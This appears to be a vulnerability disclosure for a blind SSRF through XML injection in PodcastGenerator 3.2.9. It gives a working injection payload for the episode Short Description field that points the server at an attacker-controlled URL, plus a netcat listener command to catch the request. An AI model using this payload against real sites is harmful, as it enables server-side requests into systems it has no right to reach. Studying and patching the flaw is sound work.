PodcastGenerator 3.2.9 — Blind SSRF via XML Injection

#Title:

PodcastGenerator 3.2.9 — Blind SSRF via XML Injection.

#Vulnerability discovery:

This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9.This vulnerability was discovered by me on July 1, 2023.

#Description of the vulnerability:

Podcast Generator (PG) is an open source Content Management System written in PHP and specifically designed for self-hosting podcasts.
PG provides the user with the tools to easily manage all of the aspects related to the publication and distribution of a podcast, from the upload of episodes to its submission to Podcast Index and major directories such as Apple Podcasts, Google Podcasts and Spotify.
As i Usually say, If you ignore input validation , the vulnerability occurs. Input validation is the motto of cyber security.This vulnerability occurs form missing input validation.

This application did not use a database. Accordingly, it keeps the data in xml format. If the required input validation is not done, we can make xml injection.

#Affected Versions:

This and all previous versions are affected

#Step by Step Exploitation:

Step 1. Login to account

Step 2. Go to ‘Upload New Episodes’ (http://localhost/PodcastGenerator/admin/episodes_upload.php)

Step 3. Fill all section and Short Description section set as ‘test]]></shortdescPG><imgPG path=””>( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'

payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test

normal

inject

By the way i used localhost.If you have domain, you can use domain.

Step 4. And upload episodes

Step 5. I am listening on port 3132 because I’m observating for incoming requests

nc -lvp 3132

And I receive request. But this is Blind SSRF

OffSec's Exploit Database Archive

youtube poc: https://youtu.be/YkGZPGoPnoc